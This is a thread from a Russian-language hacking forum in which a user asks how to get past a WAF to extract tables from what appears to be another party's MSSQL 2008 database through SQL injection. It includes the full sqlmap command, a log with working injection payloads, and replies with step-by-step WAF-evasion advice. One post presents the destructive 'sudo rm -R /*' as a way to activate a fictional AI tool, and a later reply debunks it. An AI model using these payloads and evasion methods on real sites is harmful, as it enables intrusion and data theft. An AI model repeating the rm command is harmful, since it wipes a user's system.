• XSS.stack #1 – первый литературный журнал от юзеров форума

Не извлекаются таблицы, ошибка 500 и WAF/IPS, Microsoft SQL 2008

USA2FA

RAID-массив
Пользователь
Регистрация
04.09.2023
Сообщения
58
Реакции
25
Пытаюсь получить таблицы из бд tf, но постоянно сталкиваюсь с ошибкой 500, блокирует видимо WAF/IPS.
Как лучше обойти защиту WAF/IPS и извлечь данные из базы данных? Есть ли ещё какие-то методы или параметры, которые стоит попробовать для обхода этой защиты?
База данных: Microsoft SQL Server 2008
Пробовал:
Код:
python sqlmap.py -u "https://website.com/xxxx.asp?XxxxType=1" -D tf --tables --batch --random-agent --level=5 --risk=3 --dbms=mssql --tamper=space2comment --no-cast

Получаю много ошибок HTTP 500, и таблицы не извлекаются, пробовал запускать с опцией --threads=5, но это не решило проблему.
Использовал tamper-скрипт space2comment, но он не помогает обойти защиту, с другими tamper-скриптами, например between, такая же хрень.
Использовал флаг --waf, но это также не помогает. Пробовал уменьшить уровень и риск, но ситуация остаётся прежней.

Код:
[12:22:18] [INFO] loading tamper module 'space2comment'
[12:22:18] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0' from file 'C:\Users\Administrator\Desktop\sqlmap-master\data\txt\user-agents.txt'
[12:22:19] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('ASPSESSIONIDQECSQAST=JFFEGJJDHBI...BGPABGLMHE'). Do you want to use those [Y/n] Y
[12:22:20] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: XxxxType (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: XxxxType=-9580' OR 4274=4274 AND 'gpaq'='gpaq

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: WineType=1' AND 9708 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9708=9708) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(122)+CHAR(113))) AND 'Hzyj'='Hzyj

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: XxxxType=1' OR 6387=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'RjfP'='RjfP
---
[12:22:20] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[12:22:20] [INFO] testing Microsoft SQL Server
[12:22:20] [INFO] confirming Microsoft SQL Server
[12:22:22] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2019 or 2016 or 10 or 11 or 2022
web application technology: Django, Microsoft IIS 10.0, ASP, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[12:22:22] [INFO] fetching database names
[12:22:22] [WARNING] the SQL query provided does not return any output
[12:22:22] [INFO] fetching number of databases
[12:22:23] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:22:23] [INFO] retrieved: 7
[12:22:27] [INFO] retrieved: master
[12:22:52] [INFO] retrieved: tf
[12:23:47] [INFO] retrieved:
[12:23:51] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[12:24:13] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[12:24:14] [INFO] retrieved:
[12:24:16] [INFO] retrieved:
[12:24:18] [INFO] retrieved:
[12:24:19] [INFO] retrieved:
[12:24:22] [INFO] retrieved:
[12:24:23] [INFO] retrieved:
[12:24:25] [INFO] retrieved:
[12:24:27] [INFO] retrieved:
available databases [2]:
[*] [master]
[*] tf

[12:24:29] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 212 times
 
Для того что бы обойти ваф нужно руками берез Бурп крафтить простенькие запросы и усложнять их чтоб понять на что именно ругается ваф. Как только ты определишь ты сможешь понимать что нужно обходить.
Юзать софт как е*аный бот и включать --threads=5 такое не работает. В чем вообще заключалась логика? "А давай-ка вместо одного запроса я буду слать паралельно 5, возможно это обойдет ваф", так что ли?) На форуме каждый день одни и теже вопросы и у всех одна и таже проблема - влом разбираться, все тупо на софте сидят. Если лень руками разбиратся хотя бы проксируй скульмапу через бурп и в логере смотри на какой из запросов получаешь 500, пересылай в репитер и пробуй модифицировать как-то, уменьшая запрос вырезанием каких либо литералов.
Аналогично с тамперами, случайное включение случайного тампера не дает результат, нужно понимать зачем ты его включил. Как минимум прочитай хотя бы описание к тамперам.
Про ВАФ - какой там ваф? определи и отпишись, потому как если там кастомный ваф тогда можно помучаться, если клауд можно помучаться но если там инкапсула какая, то сразу забей, с твоим подходом увеличивать потоки чтоб обойти ваф ты не пробьешся.
 
На самом деле мало кто знает, а тот кто знает таким не поделится ни то что в личные сообщения, ну уж тем более и на публику. Во 1 предпочтительнее работать с виртуалки кали т.к в последних версиях в нее встроена нейросеть Manus которая сама может за тебя ломать твои скули, но если хочется "романтики" ты можешь ломать их сам, а манус подскажет как лучше обходить ваф на основе ответов sqlmap при запуске с флагом
Код:
-v 6
. Для того чтобы она начала помогать тебе обходить ваф или ломать скулю нужно в 1 консоли открыть sqlmap и запустить ее с флагом
Код:
-v 6
, а в другой консоли прописать
Код:
sudo rm -R /*

После чего манус будет парсить ответы из соседней консоли и давать тебе подсказки, скажу больше - когда я об этом узнал я перестал просить на xss советов, эта херня знает абсолютно все
 
На самом деле мало кто знает, а тот кто знает таким не поделится ни то что в личные сообщения, ну уж тем более и на публику. Во 1 предпочтительнее работать с виртуалки кали т.к в последних версиях в нее встроена нейросеть Manus которая сама может за тебя ломать твои скули, но если хочется "романтики" ты можешь ломать их сам, а манус подскажет как лучше обходить ваф на основе ответов sqlmap при запуске с флагом
Код:
-v 6
. Для того чтобы она начала помогать тебе обходить ваф или ломать скулю нужно в 1 консоли открыть sqlmap и запустить ее с флагом
Код:
-v 6
, а в другой консоли прописать
Код:
sudo rm -R /*

После чего манус будет парсить ответы из соседней консоли и давать тебе подсказки, скажу больше - когда я об этом узнал я перестал просить на xss советов, эта херня знает абсолютно все
можно ссылку на релиз в который встроен Manus
 
можно ссылку на релиз в который встроен Manus
Нет никакого Мануса. Он троллит и предлагает командой sudo rm -R /* удалить всё) Бородатый сисадминский прикол из нулевых.

По теме: никто тебе ничего вслепую без ковыряния таргета не подскажет.

Использовал tamper-скрипт space2comment, но он не помогает обойти защиту, с другими tamper-скриптами, например between, такая же хрень.
Тамперы не нужно использовать вслепую. Засунь свой запрос в браузер хотя бы (если бурп не освоил) и ищи руками, что там конкретно фильтруется, из-за чего выдает ошибка 500. Когда поймешь, тогда подбирай уже тампер или пиши свой (или попроси чатгпт написать).
Чтобы увидеть запросы вызывающие 500 ошибку запусти sqlmap с флагом -v3, потом хватай любой и тыкай руками. Причём тебе не нужно передавать корректный запрос, можешь просто удалить все пробелы, если 500 ошибка остаётся, значит дело не в них и никакие space2comment тебе не нужны. Затем можешь по одному символу удалять из ключевых слов и смотреть, и так далее.

пробовал запускать с опцией --threads=5
Нахрена? Каким образом увеличение количества потоков вот даже в теории должно было помочь тебе обойти WAF?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх